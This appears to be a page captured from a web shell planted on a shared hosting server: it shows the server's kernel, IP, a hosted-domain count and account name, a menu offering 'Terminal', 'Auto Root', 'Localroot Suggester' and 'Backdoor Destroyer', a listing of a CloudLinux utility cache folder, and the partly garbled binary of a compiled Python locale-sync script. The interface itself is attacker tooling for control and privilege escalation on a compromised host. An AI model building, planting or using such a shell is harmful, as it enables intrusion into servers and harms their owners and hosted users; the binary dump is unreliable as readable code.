Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
l.v.e-manager /
utils /
__pycache__ /
Delete
Unzip
Name
Size
Permission
Date
Action
cloudlinux_cli.cpython-311.pyc
67.25
KB
-rw-r--r--
2026-08-11 11:38
cloudlinux_cli_user.cpython-311.pyc
23.41
KB
-rw-r--r--
2026-08-11 11:38
cpanel_api.cpython-311.pyc
14.66
KB
-rw-r--r--
2026-08-11 11:38
dynamicui_base.cpython-311.pyc
1.1
KB
-rw-r--r--
2026-08-11 11:38
dynamicui_cpanel.cpython-311.pyc
6.03
KB
-rw-r--r--
2026-08-11 11:38
dynamicui_da.cpython-311.pyc
4.84
KB
-rw-r--r--
2026-08-11 11:38
dynamicui_plesk.cpython-311.pyc
2.25
KB
-rw-r--r--
2026-08-11 11:38
libcagefs.cpython-311.pyc
10.05
KB
-rw-r--r--
2026-08-11 11:38
libcloudlinux.cpython-311.pyc
46.66
KB
-rw-r--r--
2026-08-11 11:38
libsupport.cpython-311.pyc
2.38
KB
-rw-r--r--
2026-08-11 11:38
sync_locales.cpython-311.pyc
5.05
KB
-rw-r--r--
2026-08-11 11:38
ui_package_installer.cpython-311.pyc
7.88
KB
-rw-r--r--
2026-09-04 11:50
Save
Rename
� l�y�� � � d dl mZ d dl mZ d dl mZ d dlZd dlZd dlZd dlZej � ej � e� � d� � ZdZ edz edz ed z d �Zedz Zd� Zd � Zd� Zd� Zdd�Zedk r e� � dS dS )� )�print_function)�division)�absolute_importNz../z/usr/share/l.v.e-locales/zcpanel/spa/assets/i18nz+plesk/htdocs/modules/plesk-lvemanager/i18n/z.directadmin/lvemanager_spa/images/assets/i18n/)�cPanel�Plesk�DirectAdminzcommons/spa-resources/i18n/c � � t j d�� � } | � ddt d�� � | � � � }t j � t � � sdS t � |j t � � }t t � � D ]a}t t |� � }t t |� � }|r"t t! j |� � |� � }t% |||� � �bdS )z? Analyze arguments and merge locale files :return: zConvert yaml locales to json)�descriptionz--panelz-pzThe target control panel)�type�helpN)�argparse�ArgumentParser�add_argument�str� parse_args�os�path�isdir�USER_LOCALES_SOURCE�MAP�get�panel�I18N_SOURCE�available_locales�read_locale_json�nested_merge�copy�deepcopy�write_locale_json)�parser�args� panel_path�locale�user_locale�current_locales �r/builddir/build/BUILDROOT/lvemanager-7.11.47-1.el9.cloudlinux.x86_64/usr/share/l.v.e-manager/utils/sync_locales.py�mainr'